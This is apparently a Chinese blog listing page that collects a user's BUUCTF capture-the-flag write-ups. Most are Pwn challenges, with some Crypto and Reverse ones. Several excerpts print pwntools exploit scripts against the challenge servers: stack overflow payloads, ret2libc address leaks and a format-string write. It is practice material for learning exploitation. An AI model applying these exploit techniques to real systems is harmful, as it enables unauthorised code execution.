自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(30)
  • 收藏
  • 关注

原创 BUUCTF-Pwn-ciscn_2019_es_2

题目截图例行检查

2022-04-04 17:02:46 432

原创 BUUCTF-Pwn-pwn2_sctf_2016

expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/pwn2_sctf_2016')p=remote('node4.buuoj.cn',27385) printf_plt=elf.plt['printf']printf_got=elf.got['printf']main=0x80485b8p.sendlineafter(b'read? ',b'-1')payload=b'a'*(0x2c+4)+p32(p

2022-03-25 23:32:31 234

原创 BUUCTF-Pwn-bjdctf_2020_babystack2

expfrom pwn import*p=remote('node4.buuoj.cn',26509) backdoor=0x0400726ret=0x40073ap.sendlineafter(b'name:\n',b'-1')payload=b'a'*(0x10+8)+p64(ret)+p64(backdoor)p.sendlineafter(b'name?\n',payload)p.interactive()

2022-03-25 22:40:06 135

原创 BUUCTF-Pwn-jarvisoj_fm

expfrom pwn import*p=remote('node4.buuoj.cn',27346) x_addr=0x804A02Cpayload=p32(x_addr)+b'%11$n'p.sendline(payload)p.interactive()

2022-03-25 21:35:17 2705

原创 BUUCTF-Pwn-bjdctf_2020_babyrop

expfrom pwn import*from LibcSearcher import *p=process('/home/lhb/桌面/bjdctf_2020_babyrop')elf=ELF('/home/lhb/桌面/bjdctf_2020_babyrop')p=remote('node4.buuoj.cn',27346) main=0x4006adpop_rdi_ret=0x400733puts_plt=elf.plt['puts']puts_got=elf.got['puts']

2022-03-25 21:18:18 394

原创 BUUCTF-Pwn-铁人三项(第五赛区)_2018_rop

expfrom pwn import*from LibcSearcher import *elf=ELF('/home/lhb/桌面/2018_rop')p=remote('node4.buuoj.cn',26218) main=0x80484C6write_plt=elf.plt['write']write_got=elf.got['write']payload=b'a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p3

2022-03-25 21:08:57 116

原创 BUUCTF-Pwn-ciscn_2019_ne_5

expfrom pwn import*elf=ELF('/home/lhb/桌面/ciscn_2019_ne_5')p=remote('node4.buuoj.cn',28555) str_sh=0x80482EAsystem_plt=elf.plt['system']p.sendline(b'administrator')p.sendline(b'1')payload=b'a'*(0x48+4)+p32(system_plt)+b'a'*4+p32(str_sh)p.sendline(

2022-03-25 10:36:10 139

原创 BUUCTF-Pwn-not_the_same_3dsctf_2016

题目截图

2022-03-04 14:24:55 107 1

原创 BUUCTF-Pwn-ciscn_2019_en_2

题目截图

2022-03-04 13:35:41 130

原创 BUUCTF-Pwn-bjdctf_2020_babystack

题目截图

2022-03-04 13:07:39 116

原创 BUUCTF-Pwn-get_started_3dsctf_2016

题目截图

2022-03-04 12:35:55 185

原创 BUUCTF-Reverse-easyre

题目截图用IDA打开按shift+F12查找字符串找到flag

2022-02-24 15:12:52 170

原创 BUUCTF-Crypto-变异凯撒

题目截图附件截图从格式可以知道afZ_表示的是flagf-a=102-97=5l-f=108-102=6a-Z=97-90=7g-_=103-95=8所以明文与密文之间的偏移是从5开始依次加一解密得flag为flag{Caesar_variation}

2022-02-22 10:26:34 167

原创 BUUCTF-Crypto-password

题目截图附件截图根据姓名和生日构造密码,从key的格式可以知道密码的长度为10位,生日19900315加上张三拼音的缩写zs刚好10位,尝试不同的大小写和排列组合得到flag为flag{zs19900315}

2022-02-22 10:04:37 1128

原创 BUUCTF-Crypto-看我回旋踢

题目截图附件截图猜想synt应该对应flag,可能是凯撒密码在线解密

2022-02-22 09:52:43 221

原创 BUUCTF-Crypto-Url编码

题目截图附件截图在线解码得到flagurl的编码规则可以百度

2022-02-22 09:42:16 170

原创 BUUCTF-Pwn-[OGeek2019]babyrop

题目截图检查文件信息开启了NX和Full RELOR用IDA打开,反汇编查看主函数查看函数sub_804871Fbuf[7]的大小为7个字节,而我们最多可以写入0x20个字节的数据,可以覆盖到v5,所以我们可以控制v5的值,在if判断中,如果buf中的字符串与s中的字符串不相同就会退出程序,但是v1控制strncmp函数比较的字符数,v1等于buf中字符串的长度,只要我们输入的数据以\0开始,v1就等于0,那么就可以绕过if判断查看函数sub_80487D0a1的值等于上一个函数中的

2022-02-16 16:19:18 2175

原创 BUUCTF-Pwn-jarvisoj_level2

题目截图检查文件信息,开启了NX用IDA打开查看字符串,存在/bin/sh,检查交叉引用发现并没有被使用查看函数表存在system函数进入主函数反汇编查看进入函数vulnerable_function()查看,发现存在栈溢出漏洞,就可以利用现有system函数和/bin/sh字符串getshellexpfrom pwn import*r=remote('node4.buuoj.cn',28083) str_bin_sh=0x804a024call_system=0x8048

2022-02-15 12:13:09 2339

原创 BUUCTF-Pwn-ciscn_2019_n_8

题目截图检查文件信息,开了NX,Canary和PIE反汇编查看主函数,只要var[13]=17就可以getshell,值得注意的是使用了(_QWORD *)进行类型转换,所以比较时读取的是QWORD即4个字的数据,也就是8个字节expfrom pwn import*r=remote('node4.buuoj.cn',28850) payload=p32(1)*13+p64(17)r.sendlineafter(b'\n', payload)r.interactive() #开启交互

2022-02-15 10:12:20 269

原创 BUUCTF-Pwn-[第五空间2019 决赛]PWN5

题目截图检查文件信息这是一个32位的程序,开启了NX和Canary用IDA打开查看找到来能getshell的代码反汇编查看主函数功能,程序将我们输入的passwd与存放在804c044地址的数进行比较,正确就可以getshell了,红框中存在格式化字符串漏洞,我们可以利用该漏洞重写804c044地址处的数据来getshell测试我们输入的内容在栈中的位置,是第10个expfrom pwn import*r=remote('node4.buuoj.cn',28850) addr=

2022-02-15 09:31:37 376

原创 BUUCTF-Pwn-ciscn_2019_c_1

题目截图检查一下文件信息开启了NX,64位的文件使用IDA打开按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串一番寻找也没有找到system函数查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手找到gets函数所在位置查看在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用双击进入查看调用函数运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码

2022-02-14 19:30:57 3635 2

原创 BUUCTF-Pwn-jarvisoj_level0

题目截图panyload=b’b’*(0x80+8)+p64(0x400596)

2022-02-12 14:15:35 343

原创 BUUCTF-Pwn-ciscn_2019_n_1

题目截图

2022-02-12 14:04:41 252

原创 BUUTF-Pwn-warmup_csaw_2016

题目截图

2022-02-12 13:53:05 429

原创 BUUCTF-Pwn-rip

题目截图使用IDA打开附件,反汇编为C语言找到两个函数可以看到主函数中定义了一个字符类型的变量s(这里IDA出了点问题,实际上应该是char s[15]),并使用gets()对其进行赋值,那么这里便存在栈溢出的漏洞,我们只需要想办法执行函数fun()就可以获得shell,进而获得flag,从IDA中可以看出定义s的大小为15个字节所以到达到溢出的目标位置就需要填充15+8=23个字节,另外从IDA中可以看出fun()的起始地址为0x401186所以我们可以构造payload=‘a’*23+

2021-11-14 16:23:34 2853

原创 BUUCTF-Crypto-摩丝

题目截图附件截图摩斯密码,使用在线工具解密解密网站:http://www.all-tool.cn/Tools/morse/?&rand=a6fe165940aeafb30e8e9ba53544f649

2021-10-31 15:57:48 388

原创 BUUCTF-Crypto-一眼就解密

题目截图从题目可以看出使用了base64加密使用在线工具解密解密网站:https://base64.us/

2021-10-31 15:44:34 108

原创 BUUCTF-Crypto-MD5

题目截图附件截图使用在线工具解密解密网站:https://www.cmd5.com/

2021-10-31 15:34:12 152

原创 BUUCTF-Pwn-test_your_nc

题目截图从题目描述可以看出,要使用要nc(netcat)命令先了解一下netcat命令是什么官网:http://netcat.sourceforge.net/netcat是一款调试 TCP/UDP 网络连接的利器,常被称作网络调试的瑞士军刀nc 有以下功能:模拟 TCP 服务端模拟 TCP 客户端模拟 UDP 服务端模拟 UDP 客户端模拟 UNIX socket 服务端模拟 UNIX socket 客户端端口扫描传输文件将服务器 bash 暴露给远程客户端内网穿透,反向获取

2021-10-31 15:20:39 764

原创 常见的几种排序算法

选择排序,堆排序,直接插入排序,折半插入排序,希尔排序,冒泡排序,快速排序,比较计数排序,基数排序

2020-05-08 15:05:18 163

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除